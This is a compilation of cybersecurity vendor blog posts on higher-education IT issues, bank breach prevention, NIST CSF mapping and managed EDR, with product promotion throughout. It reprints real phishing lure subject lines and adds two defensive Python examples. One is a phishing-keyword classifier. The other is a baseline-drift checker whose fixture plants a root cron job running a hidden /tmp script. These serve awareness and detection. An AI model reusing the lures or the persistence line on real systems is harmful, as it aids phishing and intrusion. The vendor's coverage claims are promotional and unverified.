Cyber Risk Management Solutions
The Top IT Issues Facing Higher Education Institutes In 2019

Information security strategy is one of the top 10 IT issues facing educational institutes today. Find out how Cybriant can help simplify 5 of the top 10 IT issues facing colleges today.

In an effort to improve student experiences and outcomes, EDUCAUSE gathered the 2019 Top 10 IT Issues list and dubbed it, “The Student Genome Project.” Find out more about the research here. 

Half of the Top 10 IT Issues directly involve data, along with the many challenges and opportunities it affords:

#1. Information Security Strategy: Developing a risk-based security strategy that effectively detects, responds to, and prevents security threats and challenges

#3. Privacy: Safeguarding institutional constituents’ privacy rights and maintaining accountability for protecting all types of restricted data

#5. Digital Integrations: Ensuring system interoperability, scalability, and extensibility, as well as data integrity, security, standards, and governance, across multiple applications and platforms

#6. Data-Enabled Institution: Taking a service-based approach to data and analytics to reskill, retool, and reshape a culture to be adept at data-enabled decision-making

#8. Data Management and Governance: Implementing effective institutional data-governance practices and organizational structures

We must map the student genome. We must trust and understand our data to apply it, for without data, we are blind.

Some of the work is tactical and technical. Projects are under way to develop shared, consistent data definitions and sources and to integrate those sources across many systems and, often, across competing versions. Much of the work is strategic and political. Technical silos are easier to bridge than organizational silos. Stakeholders must agree on data definitions and definitive, trusted sources. They must acknowledge the precedence of the institution over the department if the goal is to become a data-enabled institution.

The most difficult work is cultural. Cultures are social constructs that link, transcend, and outlast individuals. People are difficult to change, cultures even more so. Applying data to decision-making requires entirely new ways of making decisions, of working, of thinking. Doing so requires culture change, and that calls for leadership, a coalition, empathy, and grit.

Data privacy is newly on the list, and no wonder. Institutions are scrambling to interpret and comply with the European Union’s General Data Protection Regulation (GDPR), which contains new requirements for data collection, processing, and use. The state of California quickly followed with its California Consumer Privacy Act (CCPA), and support for a comprehensive US federal privacy law appears to be gaining traction. Millions of people have been appalled by revelations of exactly how much end-user data Facebook collects, how it has used this data to manipulate online experiences, and how it has exposed this data to third parties. This type of data use is not new, but it is newly salient. Privacy vulnerability is the dark side of collecting and using the increasing types and amounts of student data.

And then there is the issue of security. Again. Still. For several years, security has been not just on the EDUCAUSE Top 10 IT Issues list but has topped the list. Data can be trusted only if it is secured. Security threats adapt to and overcome existing protections, requiring continual monitoring and ongoing investments. Security is a risk that will never be fully prevented, but it can be managed.

Cybriant offers solutions for all five of those IT issues that fall under the trusted data scenario. Continue reading to find out more. 

1. IT ISSUES: Information Security Strategy

Developing a risk-based security strategy that effectively detects, responds to, and prevents security threats and challenges

It is an extremely high priority to secure our institutional data and systems. Threats are on the increase. We must speed up our efforts to integrate security into all aspects of our IT strategy and activities. An effective information security strategy will use a risk-focused, multi-layered approach to secure the institution. This takes a village: everyone has to participate. It is not the task of only the IT organization or the Chief Information Security Officer (CISO). If we all do our part, we can make much more progress in securing our institutions.

Risk is the most important word. These are not small risks. Information security is often ranked on institutional risk maps in the upper right quadrant. A major breach can seriously damage the reputation and financial health of the institution.

“Far too often, security is perceived as an IT problem. It truly is not. If we look at information security as an enterprise-wide risk, then we must have other stakeholders (outside of the IT organization) sitting around the table to determine how best to manage security-related risks. These stakeholders also need to determine how much risk the institution can accept. IT leaders cannot make this decision alone.”

—Cheryl Washington, Chief Information Security Officer, University of California, Davis

Start with a Strategy

We can’t stress this enough: strategy and framework are the keys to a successful security plan. With a strong information security strategy in place, every decision around IT issues becomes easier.

We prefer NIST CSF and recommend it to our clients. What is the NIST Cybersecurity Framework?

It is the National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity (CSF), which calls for “a set of industry standards and best practices to help organizations manage cybersecurity risks.”

Organizations can use the CSF to take a risk-based approach to align their security processes with business requirements. Because the CSF is not intended to be a “one size fits all” approach, Cybriant’s solution is scalable across all organizational sizes and can be adapted for specific use across multiple industries.

Read more about NIST CSF here. 

Institutions that can best maintain an effective risk-based security strategy will prevent significant damage to their finances, financing, and reputation. They’re more reliable. This trust benefits alumni, donors, parents, students, and granting agencies. These institutions have a competitive advantage in competing for research grants in this area, or for grants where security is extremely important because of the nature of the data involved. Resources not spent on breaches can be put to better use.

Where to Begin?

We recommend starting with a gap analysis or security assessment to help find a start point and produce a map to success for all IT issues. 

Hiring a firm to perform a risk/security assessment can be a daunting task. With little to go on, we often fall back on the old standbys of contracting a vendor: reputation, size, certifications, etc. And often that results in poor performance or obvious cookie-cutter results. How then should we approach the task of ensuring we get value from our security assessment vendor?

After years of performing risk/security assessments and gap analyses for various companies in different vendors I’ve noticed some themes and want to share six items to look for when selecting a vendor.

Read more from “6 Considerations for Your Next Security Assessment Vendor.”

2. IT ISSUES: Privacy

Safeguarding the institutional constituents’ privacy rights and sustaining accountability for the protection of all types of restricted data

Privacy is about properly handling personally identifiable information that institutions collect, create, store, share, use, and dispose of. Privacy affects everyone. Without sensitive personal information, institutions can’t register students, hire staff, conduct research, and complete their organizational missions. Understanding what data is being collected and how and where it is being used is central to discerning the institution’s role in safeguarding this information.

“Privacy is not the same as security. Privacy is about being able to have a say in or control over how your information is handled. People think privacy is just about protecting data; privacy is bigger than that.”

—Merri Beth Lavagnino, Director, Strategic Planning and Enterprise Risk, Indiana University

Ensuring Privacy is met through Compliance Audits

Privacy and security, while not the same thing, are equally important in the eyes of the US Government for compliance reasons. Is your institution heavily regulated, as most are? Then you should have a readily available resource for ensuring audits are a breeze. If you don’t, and most colleges and universities don’t, consider a compliance management system.

Today’s compliance environment is an overwhelming assortment of never-ending checklists and to-do items. Not only are organizations required to adhere to a standard, but there are often many standards that a company must adhere to, adding complexity to an already frustrating situation. Pulled in many directions, today’s IT professionals often feel as if they are descending into a fog of compliance.

There is also a constant stream of acronyms that businesses must now learn and adhere to in order to be compliant. Each new entrant into the pantheon of compliance weaves an even more complex web of checklists, procedures, and policies. Each time new letters are added to our alphabet soup of regulations, we must scramble to meet that specific list of requirements.

We have created a better way. Introducing ComplyCORE.

ComplyCORE clears the fog of compliance into a clear and concise vision. With ComplyCORE as your compliance management system, each new compliance matrix that springs to life is easily and quickly integrated. There is no scrambling each time an auditor for a specific regulation appears; it’s all part of the plan.


3. IT ISSUES: Digital Integrations

Ensuring system interoperability, scalability, and extensibility, as well as data integrity, security, standards, and governance, across multiple applications and platforms

Many years ago, institutional IT systems were simpler. Colleges and universities would build a monolithic ERP system, pour the data in, and expect everyone to use it. Today, with the proliferation of cloud applications and emerging applications in the research and academic space, many more applications are contending for data, requiring data sharing and data integration across platforms. A monolithic strategy is no longer practical. Digital integration is becoming more prominent in institutions due to the need to securely interconnect systems to avoid data duplication. IT organizations must ensure the integrity, security, and governance of the data in these disparate but interdependent applications.

“The number of integrations to deal with is staggering, and I keep challenging my team about how to reduce the ones we know about and support directly—which doesn’t count the ones we don’t know about.”

—Michael Gower, Executive Vice President for Finance & Administration, Rutgers, The State University of New Jersey

People, Process, And Technology 

When you have a framework in place, it helps direct the decision-making process for all IT issues, including people, process, and technology. With this in place, institutions can focus on their main goal: education. Integrating systems is a friction point that adds time and cost and detracts from your end goal. Lack of coordination and governance increases the likelihood of mistakes and missed opportunities.

What we must strive for, what we must get up every morning and make it our mission to accomplish, is the process. A far too common mistake is to believe that once we place security controls around our data, the job is done. Once we buy and install that tool, outsource that task, or hire that consulting firm, we are not done. Let’s look at the tried and true foundation of People, Process, Technology and see how it fits into your cybersecurity plan; we are going to switch it up and discuss process last.

According to ITIL News, using People, Process, and Technology for a successful implementation is not only good old-fashioned common sense but is also like a three-legged stool. The stool analogy is used because any leg that is too short or too long will cause an imbalance.

Read more about People, Process, and Technology. 

4. IT ISSUES: Data-Enabled Institution 

Taking a service-based approach to data and analytics to reskill, retool, and reshape a culture to be adept at data-enabled decision-making

As colleges and universities adapt to a rapidly changing future, the ability to make effective decisions may well distinguish those that navigate change successfully from those that don’t. We live in a world awash with data, yet many institutional leaders struggle to convert data into decisive and informed action. Without access to timely, accurate, and relevant data at the right time, leaders will not be able to make successful decisions. Applying data more rigorously and expansively to decision-making requires that technology and data professionals possess new skills. Institutions need professionals who are adept at discovery, pattern matching, and searching for the data inside the problem.

Higher education also has a programmatic opportunity. Analytics, AI, and machine learning are creating new jobs and disciplines. Technology’s impact on the needs of the impending workforce means that college and university programs have the potential for dramatic change.

“Faculty will have to work hard to adapt under a data-enabled culture. To help them, we must be transparent and clearly show how these new initiatives will benefit the students and them. We have to show evidence of IT’s value.”

—Colleen Carmean, Associate Vice Chancellor, Academic Innovation, University of Washington, Tacoma

Enable Data through Security and Compliance

It is more important than ever for data to be secure. There are two reasons: the impending doom that will follow a cyber attack if data isn’t properly secured, and failing a compliance audit because data isn’t properly secured.

Data Security – consider PREtect. 

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

PREtect is offered in 3 tiers:

  • CORE: Continuous cyber threat detection through Managed SIEM
  • ADVANCED: CORE plus Managed Endpoint Detection and Response
  • PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

Compliance Audits – Consider ComplyCORE

Instead of jumping from one compliance regime to another, rushing to ensure all the boxes are ticked, Cybriant helps your organization settle the noise by collapsing all the various compliance initiatives into one program. Currently meeting NIST and HIPAA compliance only to have PCI placed in your lap? Not a problem.

Through ComplyCORE, we can help you adopt clear policy statements and demonstrate clear and unequivocal expectations about compliance.

Find out more about ComplyCORE.

5. IT ISSUES: Data Management and Governance 

Implementing effective institutional data-governance practices and organizational structures

Colleges and universities are information-driven organizations. They create, transmit, and run on the flow of information. Data is the institution’s lifeblood. Like any other consequential resource, data has to be properly managed, curated, secured, understood, and optimized to help the institution achieve its mission and goals. Data tends to be invisible because it flows in and out of the business processes. But without the ability to use data to make decisions, institutions are flying blind. Effective data management and governance is the foundation on which decision support and intelligence capabilities are built.

“Institutions with effective data management and governance have built the pipeline to support effective decision-making.”

—Chris Gill, Chief Information Technology Officer, Drake University

Start with a Solid Foundation

Begin with a solid foundation: we recommend you start with a security assessment to determine any gaps in your data governance policy. The needs and abilities of the institution to use data look like a pyramid. At the base is the important data on which the institution is built. These data must be accurate, timely, secure, well understood, and consistently defined throughout the institution to be useful. Without this foundation, any downstream use of the data can be more harmful than beneficial.

Security or risk assessments help you protect your data and develop a foundation for strategic security decisions. Consider the assessments we currently have available and let’s start a conversation about which one is right for your institution. 

More about Compliance and Security Assessments

Ready for a Cybersecurity Assessment?

Three Things Banks Need to Know About Preventing Data Breaches

Preventing data breaches could be one of the most important things your bank or financial services firm could focus on. Here are the reasons that data breaches should be a major focus.

Banks are increasingly targeted by hackers hoping to steal valuable data. Despite high threat levels and widespread knowledge of risks, many financial institutions find themselves underprepared. There are many reasons to focus on preventing data breaches, continue reading to find out a simple way Cybriant can help.

Financial services firms fall victim to cybersecurity attacks 300 times more frequently than businesses in other industries.

To make matters worse, the costs for financial institutions to repair these incidents are often far greater, which is problematic as the average data breach cost rose 5 percent to $7 million per breach in 2017. The average cost to U.S. businesses per record, lost or stolen, during a breach was $225 – compare that to the financial industry’s number of $336 per record and you can clearly see the issue.

Moreover, according to our own research studies, consumers at this point actually expect their financial service providers to offer services that reduce the chance for exposure and, as importantly, quickly rectify the situation if their data does become compromised. Of the consumers we surveyed, 50 percent said they want their bank to offer these services and 43 percent felt the same about credit unions.  


Since a data breach leads to a loss of customer faith and market reputation, it’s critical that financial institutions, including banks, protect their networks. Here are three things banks need to know about network security standards and preventing data breaches at financial institutions.

1. Many Banks Aren’t Budgeting Enough

IT staff need to be able to respond to threats, and banks that tighten the budget on IT spending cripple this mission. Unfortunately, some banks reduce IT budgets to free up more money for customer-facing web tools and apps. This move short-circuits IT’s ability to defend against a cyber attack. Banks must take threats seriously, and this means adopting stricter network security standards and adequately funding IT departments for cyber monitoring and defense. If your clients find out that you are not doing enough to prevent data breaches and secure their investments, they may find a new bank.

2. Two-Factor Authentication is No Longer Optional

Two-factor authentication offers superior protection, but many employees dislike having to verify their identity using another method. Single-factor authentication for apps and password-protected portals leaves banks vulnerable to attack when cybercriminals have stolen legitimate user credentials.

Hackers are using more sophisticated and creative methods to easily steal login credentials. Once they have credentials, they can penetrate the system without raising any alarms.

Banks must ask themselves which is worse: the pain of having to log in via two-factor authentication or the pain of a serious data breach?

Two-factor authentication can thwart attacks. Given the low cost of implementation, it’s a no-brainer. You may even consider multi-factor authentication to go further in preventing data breaches.

3. Third-party Apps Present a Security Risk

Third-party apps promise a shortcut for financial institutions that don’t have the time or money to develop their own app, but there is a safety risk here. In the race to keep up with the competition, some banks are adopting apps that may not be up to security standards. The short-term attempt to stand out can backfire badly when apps are penetrated.

No matter the perceived need to offer customers apps and online tools, there is no excuse for failing to do due diligence when it comes to security standards or compliance requirements. Approving the app to appease the staff opens up the bank to a data breach through a third-party app. To address the security gap, banks should take a two-pronged approach: First, adopt stricter policies that target weak apps and second, ensure all apps are monitored for cyber threats.

When hackers see that a bank is not an easy target, they will look for a financial institution that has unguarded access points. By addressing these security vulnerabilities, banks can reduce their risk and continue preventing data breaches.

Preventing Data Breaches Made Simple

You need to start with a cybersecurity strategy and framework. We recommend the NIST Cybersecurity Framework and have written several articles on how to use a framework in all your decision making.

People, Process, and Technology is the cornerstone of ITIL, but can it also be used to ensure a proper cybersecurity foundation? The answer may surprise you! Read more, “People, Process, Technology in Cybersecurity or: How I Learned to Stop Worrying and Love the Process!”

Once you have the framework in place, focus on your compliance needs and risk reduction. We have created a tiered service that not only makes that efficient and affordable, but can actually make cybersecurity and preventing data breaches easy.

It’s called PREtect.

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

PREtect is offered in 3 tiers:

  • CORE: Continuous cyber threat detection through Managed SIEM
  • ADVANCED: CORE plus Managed Endpoint Detection and Response
  • PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

Learn More About PREtect

Top-Clicked Phishing Email Subject Lines of Q4 2018

Wondering what the top phishing email subject lines from Q4 of 2018 were? KnowBe4 reports on this every quarter. Take a look at the infographic; you may be surprised to see what hackers are using!

Here at Cybriant, we are no longer surprised to see the phishing email subject lines that our users click on. Even the best, most highly trained employees can be tricked. It seems you have to be suspicious of each and every email that comes into your inbox.

Through our PREtect ADVANCED service, we have the ability to stop any malicious activity before it can execute. 

PREtect ADVANCED is the second level of our tiered cybersecurity service, adding next-generation endpoint technology which utilizes AI and machine learning to insulate endpoint devices from malicious code while capturing and analyzing forensic data which Cybriant’s Security Engineers can then utilize to further isolate and remedy the threat.

PREtect ADVANCED features Endpoint Protection Including:

  • True Zero-Day Protection
  • AI-Driven Malware Prevention
  • Script Management
  • Device Usage Policy Enforcement
  • Memory Exploitation Detection and Prevention
  • Application Control for Fixed-Function Devices

Top Phishing Email Subject Lines

Even with this amazing service, you should always train your employees to know what to look for. According to the infographic below, the top general phishing email subject lines are: 

  1. Password Check Required Immediately
  2. Your Order with Amazon/Your Amazon Order Receipt
  3. Announcement: Change in Holiday Schedule
  4. Happy Holidays! Have a Drink On Us.
  5. Have a Drink on Us
  6. De-Activation of [[EMAIL]] in Process
  7. Wire Department
  8. Revised Vacation & Sick Time Policy
  9. Last Reminder: Please respond immediately
  10. UPS Label Delivery: 1ZBE312TNY00005011

From KnowBe4, the top security awareness training company:

KnowBe4 reports every quarter on the top-clicked phishing emails. Here we have the results for Q4 2018. We track three different categories: general email subjects, those related to social media and ‘in the wild’ attacks. The results come from a combination of the simulated phishing email subject lines used by our customers as well as from the millions of users that click our no-charge Phish Alert Button to report suspicious emails to their IT Incident Response team.

Trends That Persisted Throughout 2018

In reviewing the Q4 2018 most clicked subject lines, trends were easily identified; five subject line categories appeared quarter-over-quarter throughout 2018, including:

  • Deliveries
  • Passwords
  • Company Policies
  • Vacation
  • IT Department (in-the-wild)

Additionally, three “in-the-wild subject lines” were clicked three out of four quarters and included Amazon, Wells Fargo and Microsoft as keywords.
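The recurring lure categories above (Deliveries, Passwords, Company Policies, Vacation, IT Department) and the brand keywords are usable as a triage heuristic on the defender side. The following is an added example, not code from Cybriant or KnowBe4: it tags a subject line with the categories it matches, notes urgency wording, and ranks a batch for a security-awareness report. The regexes, the scoring weights and the sample subjects (taken from the top-10 list above plus one constructed IT Department lure) are assumptions made here for illustration.

```python
"""Tag mail subjects with the lure categories that persisted through 2018
and rank a batch for review. Added example; patterns are constructed, not a
vendor rule set, and keyword matching is a coarse heuristic."""
import re
from dataclasses import dataclass, field

# Lure categories from the KnowBe4 "trends that persisted" list; the regexes
# are constructed here from how the top-10 subjects phrase each lure.
LURE_PATTERNS = {
    "Deliveries": [r"\b(ups|fedex|dhl|usps)\b", r"\blabel delivery\b", r"\btracking\b"],
    "Passwords": [r"\bpassword\b", r"\bde-?activation\b", r"\baccount (?:verification|suspended)\b"],
    "Company Policies": [r"\bpolic(?:y|ies)\b", r"\bholiday schedule\b", r"\bannouncement\b"],
    "Vacation": [r"\bvacation\b", r"\bsick time\b"],
    "IT Department": [r"\bit (?:department|help ?desk|support)\b", r"\bmailbox\b"],
}
# Brand keywords that appeared in in-the-wild subjects three quarters out of four.
BRAND_KEYWORDS = ("amazon", "wells fargo", "microsoft")
# Pressure wording that pushes a user to act before thinking (constructed list).
URGENCY_CUES = (r"\bimmediately\b", r"\blast reminder\b", r"\brequired\b",
                r"\brespond\b", r"\bin process\b")

# Constructed sample batch: the page's top-10 general subjects plus one
# hypothetical "IT Department" lure in the style of the in-the-wild category.
SAMPLE_SUBJECTS = [
    "Password Check Required Immediately",
    "Your Order with Amazon/Your Amazon Order Receipt",
    "Announcement: Change in Holiday Schedule",
    "Happy Holidays! Have a Drink On Us.",
    "De-Activation of [[EMAIL]] in Process",
    "Wire Department",
    "Revised Vacation & Sick Time Policy",
    "Last Reminder: Please respond immediately",
    "UPS Label Delivery: 1ZBE312TNY00005011",
    "IT Department: Your mailbox is almost full",  # constructed
]


@dataclass
class SubjectVerdict:
    subject: str
    categories: list = field(default_factory=list)
    brands: list = field(default_factory=list)
    urgent: bool = False

    @property
    def score(self) -> int:
        # One point per matched lure category, per brand keyword, and for urgency.
        return len(self.categories) + len(self.brands) + (1 if self.urgent else 0)


def classify_subject(subject: str) -> SubjectVerdict:
    """Match one subject line against the lure categories, brands and urgency cues."""
    text = subject.lower()
    verdict = SubjectVerdict(subject=subject)
    for category, patterns in LURE_PATTERNS.items():
        if any(re.search(p, text) for p in patterns):
            verdict.categories.append(category)
    verdict.brands = [b for b in BRAND_KEYWORDS if b in text]
    verdict.urgent = any(re.search(p, text) for p in URGENCY_CUES)
    return verdict


def triage(subjects, threshold: int = 2):
    """Return (subject, score, categories) for subjects at or above the threshold,
    highest score first, for an awareness or mail-filter review report."""
    verdicts = [classify_subject(s) for s in subjects]
    flagged = [v for v in verdicts if v.score >= threshold]
    flagged.sort(key=lambda v: v.score, reverse=True)
    return [(v.subject, v.score, v.categories) for v in flagged]


if __name__ == "__main__":
    for subject, score, categories in triage(SAMPLE_SUBJECTS):
        print(f"{score}  {subject}  {categories}")
```

Note that lures with no policy, password, delivery or urgency wording ("Wire Department", the holiday drink invitation) score zero, which is exactly why the page still insists on training users rather than relying on filtering alone.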

The Subject Lines Tell Us Users Are Concerned About Security

“Clicking an email is as much about human psychology as it is about accomplishing a task,” said Perry Carpenter, chief evangelist and strategy officer at KnowBe4. “The fact that we saw ‘password’ subject lines clicked four out of four quarters shows us that users are concerned about security.

Likewise, users clicked on messages about company policies and deliveries each quarter showing a general curiosity about issues that matter to them. Knowing this information gives corporate IT departments tangible data to share with their users and to help them understand how to think before they click.”

Here is the full infographic of top subjects in all categories for the last quarter: the top 10 most-clicked general email subjects in Q4 2018, and the most common ‘in the wild’ attacks during that period.

Read the full report here. 


How to Meet the Guidelines for the NIST Cybersecurity Framework

Cybriant offers tiered cyber security services through PREtect. Each service offered through PREtect has a solution that will help you meet the NIST cybersecurity framework.

Which cybersecurity framework do you use? We discussed the importance of a framework in this previous post. A framework is a standardized methodology for selecting, implementing, testing, and maintaining a set of security metrics, also called security controls. There are many frameworks to choose from; NIST, ISO, NERC, PCI, etc., etc. The point is that you want to compare yourself against a known yardstick.

We prefer NIST CSF and recommend this to our clients.

What is the NIST Cybersecurity Framework?

It is the National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity (CSF), which calls for “a set of industry standards and best practices to help organizations manage cybersecurity risks.”

Organizations can use the CSF to take a risk-based approach to align their security processes with business requirements. Because the CSF is not intended to be a “one size fits all” approach, Cybriant’s solution is scalable across all organizational sizes and can be adapted for specific use across multiple industries.

The Cybersecurity Framework was released in February 2014 as a result of Executive Order 13636, “Improving Critical Infrastructure Cybersecurity,” which was signed on February 12, 2013. The CSF was created through collaboration between the United States government and the private sector and places a focus on aligning business needs and priorities with cybersecurity and risk management. The CSF is comprised of three parts: the Core, the Implementation Tiers and the Profile. The Core identifies cybersecurity activities and practices that share a commonality across critical infrastructure sectors.

These activities and practices are grouped into five Functions: Identify, Protect, Detect, Respond and Recover. The Implementation Tiers provide entities with context for managing cybersecurity risks and applying a plan to their specific organization. Profiles are used to match cybersecurity objectives to business requirements, risk tolerance, and resources.

Let’s talk about PREtect.

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

PREtect is offered in 3 tiers:

  • CORE: Continuous cyber threat detection through Managed SIEM
  • ADVANCED: CORE plus Managed Endpoint Detection and Response
  • PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

It’s possible to leverage Cybriant PREtect PREMIUM to help meet the guidelines and practices outlined in the CSF through automation of its technical controls.

How to use PREtect PREMIUM to meet NIST Cybersecurity Framework Guidelines

From a network security feature set, PREtect PREMIUM supports over 90% of the CSF’s technical controls. With our real-time vulnerability management solution, it is also extremely powerful for communicating CSF conformance results to many different internal and external stakeholders.

PREtect gives you continuous assurance that your security program is working. Capabilities include:

  • Information on which assets are connected to the network and how they are communicating
  • Active monitoring of host activities and events, including who is accessing them and what is changing
  • Identification of previously unknown resources, changes in behavior and new application usage
  • Near real-time metrics for continuous security and compliance
  • Correlation of real-time activity with state-based vulnerability data
  • Highly customizable dashboards, reports, and workflows for rapid response
  • Communication of consolidated metrics
  • Trends across systems, services, and geographies
  • Control of team member permissions by role
  • PREMIUM analytics with actionable information and trending to prioritize events/alerts

PREtect PREMIUM enables organizations to automate the NIST Cybersecurity Framework’s technical controls by bringing active scanning and passive monitoring, configuration auditing, host event, and data monitoring and analysis, reporting and alerting together with risk classification, assessment, and mitigation in a scalable enterprise security system.

Once an organization begins to use the NIST Cybersecurity Framework Core as a baseline for its cybersecurity and risk activities, PREtect PREMIUM makes it easier to take the step towards developing a detailed Target Profile that is both achievable and manageable.

Definitions of each function are quoted from the NIST Cybersecurity Framework, and several examples are explained below.

Identify

The activities in the Identify Function are foundational for effective use of the NIST Cybersecurity Framework.

Understanding the business context, the resources that support critical functions, and the related cybersecurity risks enables an organization to focus and prioritize its efforts, consistent with its risk management strategy and business needs. Examples of outcome Categories within this Function include Asset Management; Business Environment; Governance; Risk Assessment; and Risk Management Strategy.

Using the Risk Assessment category as an example, there are three technical controls, all of which can be automated or supported with the use of PREtect PREMIUM. Subcategory ID.RA-2 requires that “Threat and vulnerability information is received from information sharing forums and sources.”

Through our technology partners, PREtect PREMIUM refreshes its vulnerability information and threat intelligence, provided by multiple third parties, on a daily basis, which satisfies that subcategory with a defined cadence. The Risk Assessment category has two other subcategories that state “Asset vulnerabilities are identified and documented” (ID.RA-1) and “Threats, both internal and external, are identified and documented” (ID.RA-3). Both are also automated through active scanning, passive monitoring and event analysis.


Protect

The Protect Function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of outcome Categories within this Function include Access Control; Awareness and Training; Data Security; Information Protection Processes and Procedures; Maintenance; and Protective Technology.

Using the Information Protection Processes and Procedures category as an example, PREtect has numerous capabilities to automate the technical controls. Examples include:

  • PR.IP-1: Baselines are created and maintained
  • PR.IP-2: System development lifecycle to manage systems is implemented
  • PR.IP-3: Configuration change control processes are in place

The CSF contains 22 technical subcategories for Protect, 19 of which are automated or supported by PREtect PREMIUM. For example, PREtect PREMIUM performs baseline audits: systems are scanned against a “standard image” that serves as the reference for comparing other systems, and alerts are raised when configuration changes are made on endpoint devices and systems.
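The baseline audit described above, reduced to its mechanics as an added example (this is not PREtect's or Cybriant's code): a golden image is fingerprinted file by file (SHA-256 of contents plus permission bits), a host is fingerprinted the same way, and the two manifests are diffed so that added, removed, modified and re-permissioned files are reported separately. The directory trees and the drift introduced into them are constructed inline for the demonstration; the paths and contents are illustrative, not real configuration.

```python
import hashlib
import stat
import tempfile
from pathlib import Path


def _fingerprint(path: Path) -> dict:
    """Hash file contents and record the permission bits (a mode change is drift too)."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": oct(stat.S_IMODE(path.stat().st_mode))}


def build_baseline(root: str) -> dict:
    """Walk a tree (the 'standard image' or a live host) and return {relative_path: fingerprint}."""
    root_path = Path(root)
    manifest = {}
    for p in sorted(root_path.rglob("*")):
        if p.is_file() and not p.is_symlink():
            manifest[p.relative_to(root_path).as_posix()] = _fingerprint(p)
    return manifest


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Classify drift between the golden manifest and a host manifest."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed, mode_changed = [], []
    for rel in sorted(set(baseline) & set(current)):
        if baseline[rel]["sha256"] != current[rel]["sha256"]:
            changed.append(rel)
        elif baseline[rel]["mode"] != current[rel]["mode"]:
            mode_changed.append(rel)
    return {"added": added, "removed": removed, "changed": changed, "mode_changed": mode_changed}


def _write(root: Path, rel: str, text: str, mode: int = 0o644) -> None:
    p = root / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(text)
    p.chmod(mode)


def drift_demo() -> dict:
    """Constructed scenario: a golden image and a host that has drifted from it."""
    tmp = Path(tempfile.mkdtemp())
    golden, host = tmp / "golden", tmp / "host"
    for root in (golden, host):
        _write(root, "etc/ssh/sshd_config", "PermitRootLogin no\nPasswordAuthentication no\n")
        _write(root, "etc/sudoers", "root ALL=(ALL) ALL\n", 0o440)
        _write(root, "etc/motd", "Authorized use only\n")
    # Drift on the host: weakened sshd policy, world-readable sudoers,
    # an unapproved cron job, and a deleted login banner.
    _write(host, "etc/ssh/sshd_config", "PermitRootLogin yes\nPasswordAuthentication yes\n")
    (host / "etc/sudoers").chmod(0o644)
    _write(host, "etc/cron.d/updater", "* * * * * root /tmp/.u.sh\n")
    (host / "etc/motd").unlink()
    return diff_baseline(build_baseline(golden), build_baseline(host))


if __name__ == "__main__":
    for kind, paths in drift_demo().items():
        print(f"{kind}: {paths}")
```

In practice the golden manifest is produced once from the approved image and stored signed, and each host's manifest is produced by an agent on a schedule; any non-empty diff is the alert, and the configuration change control process (PR.IP-3) decides whether the change was approved.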


Detect

The Detect Function enables the timely discovery of cybersecurity events. Examples of outcome Categories within this Function include Anomalies and Events; Security Continuous Monitoring; and Detection Processes.

Using the Security Continuous Monitoring category as an example, PREtect PREMIUM has numerous automated capabilities to fulfill these controls. Examples include:

  • DE.CM-1: Network is monitored to detect potential cybersecurity events
  • DE.CM-3: Personnel activity is monitored to detect potential cybersecurity events
  • DE.CM-4: Malicious code is detected
  • DE.CM-5: Unauthorized mobile code is detected

The CSF contains 14 technical subcategories for Detect, 13 of which are automated or supported by PREtect PREMIUM. For example, through active and agent scanning, continuous listening and host data analysis, PREtect PREMIUM can observe network and user activity, detect vulnerabilities and events, and alert and report on these as part of an overall cybersecurity plan.


Respond

The Respond Function supports the ability to contain the impact of a potential cybersecurity incident. Examples of outcome Categories within this Function include Response Planning; Communications; Analysis; Mitigation; and Improvements.


Recover

The Recover Function supports timely recovery to normal operations to reduce the impact from a cybersecurity event. Examples of outcome Categories within this Function include Recovery Planning; Improvements; and Communications.

The Respond and Recover Functions consist of categories and subcategories that are mostly administrative in nature, such as “Response plan is executed during or after an event,” “Recovery plans incorporate lessons learned,” and “Public relations are managed.” PREtect PREMIUM’s capabilities are focused primarily on the CSF’s technical controls, and although some exceptions exist, PREtect PREMIUM does not provide full support for the administrative Respond and Recover Functions.

Concurrent and Continuous Monitoring

Strong security, as prescribed in the CSF, requires broad visibility across extended networks, including IT systems, industrial control systems (ICS), virtual infrastructure, cloud, and BYOD. This visibility cannot rely solely on point-in-time data acquisition; it requires continuous, real-time data. The technology behind PREtect PREMIUM acquires security data from across the organization, using sources such as network traffic, virtual systems, mobile device management, patch management, host activity monitoring, and external threat intelligence feeds, to feed an intelligent monitoring system. It analyzes this data to identify and prioritize anomalies and suspicious behavior so our team can investigate and resolve them effectively.


2019 Guide to Managed EDR Security


Managed EDR Security is more important in 2019 than it ever has been. Here are our top guides and recommendations for managed endpoint detection and response.


Endpoints are attackers’ favorite targets and the weakest link in your company’s network. In 2017, the WannaCry attack was reported to have infected some 230,000 endpoints around the world. To this end, deploying endpoint detection and response (EDR) is a VITAL aspect of cybersecurity for every company that needs to be proactive against modern-day threats.

What is EDR?

EDR is primarily a technology that brings a proactive approach to cybersecurity. Most traditional products react to security threats; EDR does not stop there. EDR security monitors endpoints in real time, hunting for threats that have already found their way past the company’s defenses. You also get greater visibility into what is happening on endpoints, and the mechanisms to help mitigate attacks.

One of the tactics most commonly associated with cybercriminals is compromising endpoints, which gives them a foothold on the network. With rapid detection of, and response to, attacks targeting hosts (laptops, desktops, and servers), you can stay a step ahead in securing your IT infrastructure.

What is Managed Detection and Response?

Managed detection and response is a service that exists because organizations need resources to take stock of their risks and improve their ability to detect and respond to threats.

Companies have their own sets of tools and procedures for detecting and responding to threats, but all MDR services share similar characteristics:

  • MDR is concerned with threat detection rather than compliance.
  • Services are delivered using the provider’s tools and technologies, deployed in the customer’s environment.
